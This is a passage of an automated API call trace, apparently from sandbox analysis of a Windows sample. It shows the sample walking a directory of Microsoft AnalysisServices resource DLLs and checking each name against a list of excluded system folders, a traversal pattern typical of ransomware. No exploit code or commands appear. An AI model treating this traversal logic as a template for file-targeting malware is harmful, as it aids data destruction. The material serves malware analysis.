(lpString1="Microsoft.AnalysisServices.Common.Wizard.resources.dll", lpString2="$RECYCLE.BIN") returned 1 [0126.887] lstrcmpiW (lpString1="Microsoft.AnalysisServices.Common.Wizard.resources.dll", lpString2="system volume information") returned -1 [0126.887] lstrcmpiW (lpString1="Microsoft.AnalysisServices.Common.Wizard.resources.dll", lpString2="msocache") returned -1 [0126.887] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x209710 [0126.887] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.AnalysisServices.Common.Wizard.resources.dll", cchWideChar=54, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 54 [0126.887] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dde8 [0126.887] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.AnalysisServices.Common.Wizard.resources.dll", cchWideChar=54, lpMultiByteStr=0x20dde8, cbMultiByte=54, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.AnalysisServices.Common.Wizard.resources.dll", lpUsedDefaultChar=0x0) returned 54 [0126.888] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x209710 | out: hHeap=0x1e0000) returned 1 [0126.888] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x209620 [0126.888] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.AnalysisServices.Common.Wizard.resources.dll", cchWideChar=54, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 54 [0126.888] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dba8 [0126.888] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.AnalysisServices.Common.Wizard.resources.dll", cchWideChar=54, lpMultiByteStr=0x20dba8, cbMultiByte=54, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.AnalysisServices.Common.Wizard.resources.dll", lpUsedDefaultChar=0x0) returned 54 [0126.888] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x209620 | out: hHeap=0x1e0000) returned 1 [0126.888] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x120) returned 0x23f158 [0126.888] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23ddc8 | out: hHeap=0x1e0000) returned 1 [0126.888] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dba8 | out: hHeap=0x1e0000) returned 1 [0126.888] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dde8 | out: hHeap=0x1e0000) returned 1 [0126.888] FindNextFileW (in: hFindFile=0x231c00, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x4c3d17b, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x4c3d17b, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x4c63313, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x13a90, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="Microsoft.AnalysisServices.Excel.BackEnd.resources.dll", cAlternateFileName="MI038C~1.DLL")) returned 1 [0126.888] lstrcmpiW (lpString1="Microsoft.AnalysisServices.Excel.BackEnd.resources.dll", lpString2=".") returned 1 [0126.888] lstrcmpiW (lpString1="Microsoft.AnalysisServices.Excel.BackEnd.resources.dll", lpString2="..") returned 1 [0126.888] lstrcmpiW (lpString1="Microsoft.AnalysisServices.Excel.BackEnd.resources.dll", lpString2="...") returned 1 [0126.888] lstrcmpiW (lpString1="Microsoft.AnalysisServices.Excel.BackEnd.resources.dll", lpString2="windows") returned -1 [0126.888] lstrcmpiW (lpString1="Microsoft.AnalysisServices.Excel.BackEnd.resources.dll", lpString2="recovery") returned -1 [0126.888] lstrcmpiW (lpString1="Microsoft.AnalysisServices.Excel.BackEnd.resources.dll", lpString2="perflogs") returned -1 [0126.888] lstrcmpiW (lpString1="Microsoft.AnalysisServices.Excel.BackEnd.resources.dll", lpString2="documents and settings") returned 1 [0126.888] lstrcmpiW (lpString1="Microsoft.AnalysisServices.Excel.BackEnd.resources.dll", lpString2="$RECYCLE.BIN") returned 1 [0126.888] lstrcmpiW (lpString1="Microsoft.AnalysisServices.Excel.BackEnd.resources.dll", lpString2="system volume information") returned -1 [0126.888] lstrcmpiW (lpString1="Microsoft.AnalysisServices.Excel.BackEnd.resources.dll", lpString2="msocache") returned -1 [0126.888] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x2094b8 [0126.888] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.AnalysisServices.Excel.BackEnd.resources.dll", cchWideChar=54, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 54 [0126.888] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dde8 [0126.888] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.AnalysisServices.Excel.BackEnd.resources.dll", cchWideChar=54, lpMultiByteStr=0x20dde8, cbMultiByte=54, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.AnalysisServices.Excel.BackEnd.resources.dll", lpUsedDefaultChar=0x0) returned 54 [0126.888] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2094b8 | out: hHeap=0x1e0000) returned 1 [0126.888] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x209710 [0126.888] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.AnalysisServices.Excel.BackEnd.resources.dll", cchWideChar=54, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 54 [0126.888] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20d698 [0126.888] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.AnalysisServices.Excel.BackEnd.resources.dll", cchWideChar=54, lpMultiByteStr=0x20d698, cbMultiByte=54, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.AnalysisServices.Excel.BackEnd.resources.dll", lpUsedDefaultChar=0x0) returned 54 [0126.888] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x209710 | out: hHeap=0x1e0000) returned 1 [0126.888] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x120) returned 0x23fa98 [0126.888] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23f158 | out: hHeap=0x1e0000) returned 1 [0126.888] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20d698 | out: hHeap=0x1e0000) returned 1 [0126.889] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dde8 | out: hHeap=0x1e0000) returned 1 [0126.889] FindNextFileW (in: hFindFile=0x231c00, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x86a6c5d, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x86a6c5d, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x86cced8, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x200030, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="Microsoft.AnalysisServices.Excel.Common.FrontEnd.resources.dll", cAlternateFileName="MIF61E~1.DLL")) returned 1 [0126.889] lstrcmpiW (lpString1="Microsoft.AnalysisServices.Excel.Common.FrontEnd.resources.dll", lpString2=".") returned 1 [0126.889] lstrcmpiW (lpString1="Microsoft.AnalysisServices.Excel.Common.FrontEnd.resources.dll", lpString2="..") returned 1 [0126.889] lstrcmpiW (lpString1="Microsoft.AnalysisServices.Excel.Common.FrontEnd.resources.dll", lpString2="...") returned 1 [0126.889] lstrcmpiW (lpString1="Microsoft.AnalysisServices.Excel.Common.FrontEnd.resources.dll", lpString2="windows") returned -1 [0126.889] lstrcmpiW (lpString1="Microsoft.AnalysisServices.Excel.Common.FrontEnd.resources.dll", lpString2="recovery") returned -1 [0126.889] lstrcmpiW (lpString1="Microsoft.AnalysisServices.Excel.Common.FrontEnd.resources.dll", lpString2="perflogs") returned -1 [0126.889] lstrcmpiW (lpString1="Microsoft.AnalysisServices.Excel.Common.FrontEnd.resources.dll", lpString2="documents and settings") returned 1 [0126.889] lstrcmpiW (lpString1="Microsoft.AnalysisServices.Excel.Common.FrontEnd.resources.dll", lpString2="$RECYCLE.BIN") returned 1 [0126.889] lstrcmpiW (lpString1="Microsoft.AnalysisServices.Excel.Common.FrontEnd.resources.dll", lpString2="system volume information") returned -1 [0126.889] lstrcmpiW (lpString1="Microsoft.AnalysisServices.Excel.Common.FrontEnd.resources.dll", lpString2="msocache") returned -1 [0126.889] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x224d50 [0126.889] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.AnalysisServices.Excel.Common.FrontEnd.resources.dll", cchWideChar=62, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 62 [0126.889] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dba8 [0126.889] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.AnalysisServices.Excel.Common.FrontEnd.resources.dll", cchWideChar=62, lpMultiByteStr=0x20dba8, cbMultiByte=62, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.AnalysisServices.Excel.Common.FrontEnd.resources.dll", lpUsedDefaultChar=0x0) returned 62 [0126.889] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x224d50 | out: hHeap=0x1e0000) returned 1 [0126.889] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x224e60 [0126.889] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.AnalysisServices.Excel.Common.FrontEnd.resources.dll", cchWideChar=62, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 62 [0126.889] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20d770 [0126.889] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.AnalysisServices.Excel.Common.FrontEnd.resources.dll", cchWideChar=62, lpMultiByteStr=0x20d770, cbMultiByte=62, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.AnalysisServices.Excel.Common.FrontEnd.resources.dll", lpUsedDefaultChar=0x0) returned 62 [0126.889] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x224e60 | out: hHeap=0x1e0000) returned 1 [0126.889] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x130) returned 0x244be8 [0126.889] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23fa98 | out: hHeap=0x1e0000) returned 1 [0126.889] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20d770 | out: hHeap=0x1e0000) returned 1 [0126.889] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dba8 | out: hHeap=0x1e0000) returned 1 [0126.889] FindNextFileW (in: hFindFile=0x231c00, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x17c93f4, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x17c93f4, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x17c93f4, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x3030, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="Microsoft.AnalysisServices.Layout.resources.dll", cAlternateFileName="MI8E88~1.DLL")) returned 1 [0126.890] lstrcmpiW (lpString1="Microsoft.AnalysisServices.Layout.resources.dll", lpString2=".") returned 1 [0126.890] lstrcmpiW (lpString1="Microsoft.AnalysisServices.Layout.resources.dll", lpString2="..") returned 1 [0126.890] lstrcmpiW (lpString1="Microsoft.AnalysisServices.Layout.resources.dll", lpString2="...") returned 1 [0126.890] lstrcmpiW (lpString1="Microsoft.AnalysisServices.Layout.resources.dll", lpString2="windows") returned -1 [0126.890] lstrcmpiW (lpString1="Microsoft.AnalysisServices.Layout.resources.dll", lpString2="recovery") returned -1 [0126.890] lstrcmpiW (lpString1="Microsoft.AnalysisServices.Layout.resources.dll", lpString2="perflogs") returned -1 [0126.890] lstrcmpiW (lpString1="Microsoft.AnalysisServices.Layout.resources.dll", lpString2="documents and settings") returned 1 [0126.890] lstrcmpiW (lpString1="Microsoft.AnalysisServices.Layout.resources.dll", lpString2="$RECYCLE.BIN") returned 1 [0126.890] lstrcmpiW (lpString1="Microsoft.AnalysisServices.Layout.resources.dll", lpString2="system volume information") returned -1 [0126.890] lstrcmpiW (lpString1="Microsoft.AnalysisServices.Layout.resources.dll", lpString2="msocache") returned -1 [0126.890] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x2330f8 [0126.890] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.AnalysisServices.Layout.resources.dll", cchWideChar=47, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 47 [0126.890] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0126.890] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.AnalysisServices.Layout.resources.dll", cchWideChar=47, lpMultiByteStr=0x22cdc8, cbMultiByte=47, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.AnalysisServices.Layout.resources.dll", lpUsedDefaultChar=0x0) returned 47 [0126.890] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2330f8 | out: hHeap=0x1e0000) returned 1 [0126.890] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x2330f8 [0126.890] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.AnalysisServices.Layout.resources.dll", cchWideChar=47, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 47 [0126.890] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0d8 [0126.890] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.AnalysisServices.Layout.resources.dll", cchWideChar=47, lpMultiByteStr=0x22d0d8, cbMultiByte=47, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.AnalysisServices.Layout.resources.dll", lpUsedDefaultChar=0x0) returned 47 [0126.890] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2330f8 | out: hHeap=0x1e0000) returned 1 [0126.890] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x110) returned 0x23e570 [0126.890] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x244be8 | out: hHeap=0x1e0000) returned 1 [0126.890] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0d8 | out: hHeap=0x1e0000) returned 1 [0126.890] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0126.890] FindNextFileW (in: hFindFile=0x231c00, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xefe00baf, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xefe00baf, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf00d5872, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x1d038, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="Microsoft.AnalysisServices.XLHost.Modeler.resources.dll", cAlternateFileName="MICROS~1.DLL")) returned 1 [0126.890] lstrcmpiW (lpString1="Microsoft.AnalysisServices.XLHost.Modeler.resources.dll", lpString2=".") returned 1 [0126.890] lstrcmpiW (lpString1="Microsoft.AnalysisServices.XLHost.Modeler.resources.dll", lpString2="..") returned 1 [0126.890] lstrcmpiW (lpString1="Microsoft.AnalysisServices.XLHost.Modeler.resources.dll", lpString2="...") returned 1 [0126.890] lstrcmpiW (lpString1="Microsoft.AnalysisServices.XLHost.Modeler.resources.dll", lpString2="windows") returned -1 [0126.890] lstrcmpiW (lpString1="Microsoft.AnalysisServices.XLHost.Modeler.resources.dll", lpString2="recovery") returned -1 [0126.890] lstrcmpiW (lpString1="Microsoft.AnalysisServices.XLHost.Modeler.resources.dll", lpString2="perflogs") returned -1 [0126.890] lstrcmpiW (lpString1="Microsoft.AnalysisServices.XLHost.Modeler.resources.dll", lpString2="documents and settings") returned 1 [0126.890] lstrcmpiW (lpString1="Microsoft.AnalysisServices.XLHost.Modeler.resources.dll", lpString2="$RECYCLE.BIN") returned 1 [0126.890] lstrcmpiW (lpString1="Microsoft.AnalysisServices.XLHost.Modeler.resources.dll", lpString2="system volume information") returned -1 [0126.891] lstrcmpiW (lpString1="Microsoft.AnalysisServices.XLHost.Modeler.resources.dll", lpString2="msocache") returned -1 [0126.891] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x209788 [0126.891] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.AnalysisServices.XLHost.Modeler.resources.dll", cchWideChar=55, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 55 [0126.891] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20d578 [0126.891] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.AnalysisServices.XLHost.Modeler.resources.dll", cchWideChar=55, lpMultiByteStr=0x20d578, cbMultiByte=55, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.AnalysisServices.XLHost.Modeler.resources.dll", lpUsedDefaultChar=0x0) returned 55 [0126.891] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x209788 | out: hHeap=0x1e0000) returned 1 [0126.891] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x209788 [0126.891] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.AnalysisServices.XLHost.Modeler.resources.dll", cchWideChar=55, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 55 [0126.891] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20d920 [0126.891] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.AnalysisServices.XLHost.Modeler.resources.dll", cchWideChar=55, lpMultiByteStr=0x20d920, cbMultiByte=55, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.AnalysisServices.XLHost.Modeler.resources.dll", lpUsedDefaultChar=0x0) returned 55 [0126.891] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x209788 | out: hHeap=0x1e0000) returned 1 [0126.891] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x120) returned 0x23f280 [0126.891] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23e570 | out: hHeap=0x1e0000) returned 1 [0126.891] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20d920 | out: hHeap=0x1e0000) returned 1 [0126.891] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20d578 | out: hHeap=0x1e0000) returned 1 [0126.891] FindNextFileW (in: hFindFile=0x231c00, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x29f7370, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x29f7370, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x2ebbef3, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x2e60, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="Microsoft.DataWarehouse.Interfaces.resources.dll", cAlternateFileName="MIE9BA~1.DLL")) returned 1 [0126.891] lstrcmpiW (lpString1="Microsoft.DataWarehouse.Interfaces.resources.dll", lpString2=".") returned 1 [0126.891] lstrcmpiW (lpString1="Microsoft.DataWarehouse.Interfaces.resources.dll", lpString2="..") returned 1 [0126.891] lstrcmpiW (lpString1="Microsoft.DataWarehouse.Interfaces.resources.dll", lpString2="...") returned 1 [0126.891] lstrcmpiW (lpString1="Microsoft.DataWarehouse.Interfaces.resources.dll", lpString2="windows") returned -1 [0126.891] lstrcmpiW (lpString1="Microsoft.DataWarehouse.Interfaces.resources.dll", lpString2="recovery") returned -1 [0126.891] lstrcmpiW (lpString1="Microsoft.DataWarehouse.Interfaces.resources.dll", lpString2="perflogs") returned -1 [0126.891] lstrcmpiW (lpString1="Microsoft.DataWarehouse.Interfaces.resources.dll", lpString2="documents and settings") returned 1 [0126.891] lstrcmpiW (lpString1="Microsoft.DataWarehouse.Interfaces.resources.dll", lpString2="$RECYCLE.BIN") returned 1 [0126.891] lstrcmpiW (lpString1="Microsoft.DataWarehouse.Interfaces.resources.dll", lpString2="system volume information") returned -1 [0126.891] lstrcmpiW (lpString1="Microsoft.DataWarehouse.Interfaces.resources.dll", lpString2="msocache") returned -1 [0126.891] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x2095a8 [0126.891] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.DataWarehouse.Interfaces.resources.dll", cchWideChar=48, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 48 [0126.891] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20d728 [0126.891] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.DataWarehouse.Interfaces.resources.dll", cchWideChar=48, lpMultiByteStr=0x20d728, cbMultiByte=48, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.DataWarehouse.Interfaces.resources.dll", lpUsedDefaultChar=0x0) returned 48 [0126.891] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2095a8 | out: hHeap=0x1e0000) returned 1 [0126.891] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x209878 [0126.891] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.DataWarehouse.Interfaces.resources.dll", cchWideChar=48, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 48 [0126.891] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20d578 [0126.891] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.DataWarehouse.Interfaces.resources.dll", cchWideChar=48, lpMultiByteStr=0x20d578, cbMultiByte=48, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.DataWarehouse.Interfaces.resources.dll", lpUsedDefaultChar=0x0) returned 48 [0126.892] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x209878 | out: hHeap=0x1e0000) returned 1 [0126.892] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x110) returned 0x23e340 [0126.892] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23f280 | out: hHeap=0x1e0000) returned 1 [0126.892] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20d578 | out: hHeap=0x1e0000) returned 1 [0126.892] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20d728 | out: hHeap=0x1e0000) returned 1 [0126.892] FindNextFileW (in: hFindFile=0x231c00, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf9992797, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xf9992797, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf99b89f6, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x4c050, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="Microsoft.DataWarehouse.resources.dll", cAlternateFileName="MICROS~4.DLL")) returned 1 [0126.892] lstrcmpiW (lpString1="Microsoft.DataWarehouse.resources.dll", lpString2=".") returned 1 [0126.892] lstrcmpiW (lpString1="Microsoft.DataWarehouse.resources.dll", lpString2="..") returned 1 [0126.892] lstrcmpiW (lpString1="Microsoft.DataWarehouse.resources.dll", lpString2="...") returned 1 [0126.892] lstrcmpiW (lpString1="Microsoft.DataWarehouse.resources.dll", lpString2="windows") returned -1 [0126.892] lstrcmpiW (lpString1="Microsoft.DataWarehouse.resources.dll", lpString2="recovery") returned -1 [0126.892] lstrcmpiW (lpString1="Microsoft.DataWarehouse.resources.dll", lpString2="perflogs") returned -1 [0126.892] lstrcmpiW (lpString1="Microsoft.DataWarehouse.resources.dll", lpString2="documents and settings") returned 1 [0126.892] lstrcmpiW (lpString1="Microsoft.DataWarehouse.resources.dll", lpString2="$RECYCLE.BIN") returned 1 [0126.892] lstrcmpiW (lpString1="Microsoft.DataWarehouse.resources.dll", lpString2="system volume information") returned -1 [0126.892] lstrcmpiW (lpString1="Microsoft.DataWarehouse.resources.dll", lpString2="msocache") returned -1 [0126.892] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c118 [0126.892] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.DataWarehouse.resources.dll", cchWideChar=37, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 37 [0126.892] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d298 [0126.892] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.DataWarehouse.resources.dll", cchWideChar=37, lpMultiByteStr=0x22d298, cbMultiByte=37, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.DataWarehouse.resources.dll", lpUsedDefaultChar=0x0) returned 37 [0126.892] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c118 | out: hHeap=0x1e0000) returned 1 [0126.892] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c5e8 [0126.892] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.DataWarehouse.resources.dll", cchWideChar=37, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: 